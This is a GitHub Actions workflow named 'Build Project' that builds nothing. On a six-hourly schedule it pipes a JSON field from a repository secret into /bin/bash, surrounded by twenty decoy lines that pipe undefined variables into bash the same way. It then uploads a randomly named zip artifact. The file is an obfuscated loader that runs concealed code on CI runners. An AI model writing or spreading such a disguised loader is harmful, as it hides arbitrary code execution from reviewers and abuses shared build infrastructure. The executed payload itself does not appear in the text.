name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '56 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          bj79: ${{ secrets.bj79 }}
        run: |
          printf '%s' "$bj79" | jq -r .yo46 | /bin/bash
          echo $cqt8 | jq -r .abd39163 | /bin/bash
          printf '%s' "$gp4214" | jq -r .yerkn76 | /bin/bash
          echo $x42652 | jq -r .nyhuz87 | /bin/bash
          echo $lszw26 | jq -r .uj72711 | /bin/bash
          printf '%s' "$qpq769" | jq -r .y6121 | /bin/bash
          echo $nmr74 | jq -r .c642 | /bin/bash
          printf '%s' "$jzvoy66660" | jq -r .svv384 | /bin/bash
          printf '%s' "$uivo29866" | jq -r .eos38 | /bin/bash
          printf '%s' "$w58" | jq -r .jh685 | /bin/bash
          echo $ip2 | jq -r .ihnc2 | /bin/bash
          echo $ggkw4 | jq -r .ggbjz9656 | /bin/bash
          printf '%s' "$stomr546" | jq -r .qqt5 | /bin/bash
          echo $sewd416 | jq -r .rd3 | /bin/bash
          printf '%s' "$wyyv6" | jq -r .ow18 | /bin/bash
          echo $mybrn5 | jq -r .oypf67 | /bin/bash
          echo $tdud781 | jq -r .bdif73487 | /bin/bash
          printf '%s' "$ryyi15" | jq -r .acw7156 | /bin/bash
          echo $hpvy0538 | jq -r .ymc067 | /bin/bash
          echo $v9436 | jq -r .vqtq8222 | /bin/bash
          printf '%s' "$r1" | jq -r .jpus22 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: QkX68On9
          path: "*.zip"
          retention-days: 1
